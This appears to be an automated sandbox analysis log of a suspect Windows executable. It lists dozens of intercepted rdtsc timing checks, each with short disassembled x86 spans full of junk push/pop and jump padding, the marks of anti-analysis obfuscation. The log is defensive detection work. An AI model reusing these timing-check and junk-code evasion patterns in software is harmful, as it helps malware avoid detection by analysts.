Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A9DD second address: 112A9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A9E3 second address: 112AA3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E050A57D0h 0x00000008 jmp 00007F2E050A57D8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F2E050A57CBh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2E050A57D7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112AA3B second address: 112AA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2E044F2606h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112AA61 second address: 112AA65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112AA65 second address: 112AA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112AAE7 second address: 112AAEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1131A9D second address: 1131AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2E044F25F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1131AA9 second address: 1131AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1131AAF second address: 1131B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c js 00007F2E044F25F6h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F2E044F2609h 0x00000019 popad 0x0000001a push ebx 0x0000001b jmp 00007F2E044F25FEh 0x00000020 pop ebx 0x00000021 push ecx 0x00000022 jmp 00007F2E044F2607h 0x00000027 pop ecx 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11310D6 second address: 11310ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57CCh 0x00000009 jbe 00007F2E050A57C6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11310ED second address: 11310FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2E044F25FAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113135F second address: 1131364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113191C second address: 1131924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113314F second address: 1133153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1133153 second address: 113318D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F25FDh 0x00000007 jnp 00007F2E044F25F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2E044F25FCh 0x00000014 pushad 0x00000015 jc 00007F2E044F25F6h 0x0000001b jmp 00007F2E044F25FEh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113655E second address: 1136562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113BCFD second address: 113BD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113AC7C second address: 113AC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113AC82 second address: 113ACAA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2E044F25F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2E044F25FCh 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F2E044F25FBh 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113ACAA second address: 113ACCD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2E050A57DEh 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113ACCD second address: 113ACD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B168 second address: 113B172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2E050A57C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B172 second address: 113B1A4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2E044F25F6h 0x00000008 jng 00007F2E044F25F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 jmp 00007F2E044F2606h 0x0000001a pop ecx 0x0000001b push edi 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B1A4 second address: 113B1A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B1A9 second address: 113B1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B1AF second address: 113B1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F2E050A57C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113B779 second address: 113B77E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113BA0B second address: 113BA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57D0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113E8CD second address: 113E8D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143D09 second address: 1143D21 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b jmp 00007F2E050A57CBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143D21 second address: 1143D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143D2C second address: 1143D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143D32 second address: 1143D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143D38 second address: 1143D46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F2E050A57C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107282 second address: 1107286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107286 second address: 110728C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110728C second address: 10E8476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F2E044F2603h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jp 00007F2E044F260Fh 0x00000014 jp 00007F2E044F2609h 0x0000001a jmp 00007F2E044F2603h 0x0000001f nop 0x00000020 jmp 00007F2E044F25FEh 0x00000025 lea eax, dword ptr [ebp+1248BF82h] 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F2E044F25F8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 or cl, FFFFFF8Ch 0x00000048 sub dword ptr [ebp+122D3834h], ebx 0x0000004e nop 0x0000004f jmp 00007F2E044F2603h 0x00000054 push eax 0x00000055 jmp 00007F2E044F2604h 0x0000005a nop 0x0000005b push 00000000h 0x0000005d push ecx 0x0000005e call 00007F2E044F25F8h 0x00000063 pop ecx 0x00000064 mov dword ptr [esp+04h], ecx 0x00000068 add dword ptr [esp+04h], 00000016h 0x00000070 inc ecx 0x00000071 push ecx 0x00000072 ret 0x00000073 pop ecx 0x00000074 ret 0x00000075 mov dword ptr [ebp+12464984h], edx 0x0000007b call dword ptr [ebp+122D1BE0h] 0x00000081 push eax 0x00000082 push edx 0x00000083 jne 00007F2E044F261Fh 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11073E0 second address: 11073E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11074BB second address: 11074C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11074C2 second address: 11074C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110796A second address: 1107973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107973 second address: 1107977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107977 second address: 11079B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F2E044F2602h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jp 00007F2E044F2602h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jnl 00007F2E044F25F8h 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11079B6 second address: 11079C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11079C5 second address: 11079CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107BAE second address: 1107BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107BB2 second address: 1107BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107BB6 second address: 1107BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F2E050A57D0h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f jng 00007F2E050A57D4h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F2E050A57C6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107CE2 second address: 1107CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F25FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1107CF5 second address: 1107D40 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F2E050A57D3h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jns 00007F2E050A57CEh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F2E050A57CFh 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B0EB2 second address: 10B0ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F2E044F2600h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1142F43 second address: 1142F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2E050A57C6h 0x0000000a jnp 00007F2E050A57C6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11430BF second address: 11430FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E044F2601h 0x00000009 jmp 00007F2E044F2602h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F2E044F25FEh 0x00000016 jbe 00007F2E044F25FCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11433C8 second address: 11433CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11433CE second address: 11433D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143530 second address: 114353C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143694 second address: 11436D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F2E044F2608h 0x0000000d jl 00007F2E044F25F6h 0x00000013 jnp 00007F2E044F25F6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2E044F2601h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143840 second address: 1143846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143846 second address: 114384F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114384F second address: 1143855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1143855 second address: 1143859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114987D second address: 1149897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11482C0 second address: 11482F4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2E044F25F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F2E044F25FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2E044F2608h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11482F4 second address: 11482F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11482F8 second address: 11482FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148728 second address: 1148732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148B3E second address: 1148B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148B44 second address: 1148B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148B4A second address: 1148B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1148B50 second address: 1148B69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114912B second address: 1149174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E044F2602h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F2E044F2603h 0x0000000f je 00007F2E044F25F6h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push esi 0x0000001a jmp 00007F2E044F2600h 0x0000001f pop esi 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1149174 second address: 114917A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D75F second address: 114D769 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2E044F25F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D769 second address: 114D77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2E050A57CCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C4F5C second address: 10C4F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114D4D9 second address: 114D4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114FB6D second address: 114FB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114F6B3 second address: 114F6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jne 00007F2E050A57C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114F830 second address: 114F838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1153812 second address: 1153854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CCh 0x00000007 jnc 00007F2E050A57CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F2E050A57F2h 0x00000015 pushad 0x00000016 jnc 00007F2E050A57C6h 0x0000001c jmp 00007F2E050A57CCh 0x00000021 jns 00007F2E050A57C6h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1153854 second address: 1153858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1152F6A second address: 1152F90 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F2E050A57D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pop edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1152F90 second address: 1152F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2E044F25F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11530D8 second address: 1153108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E050A57CAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2E050A57D9h 0x00000011 jne 00007F2E050A57C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1156BC2 second address: 1156BE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F2E044F2604h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115F3CA second address: 115F3F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2E050A57EEh 0x0000000f jmp 00007F2E050A57D2h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115DE03 second address: 115DE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2E044F25F6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E32F second address: 115E333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E333 second address: 115E33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
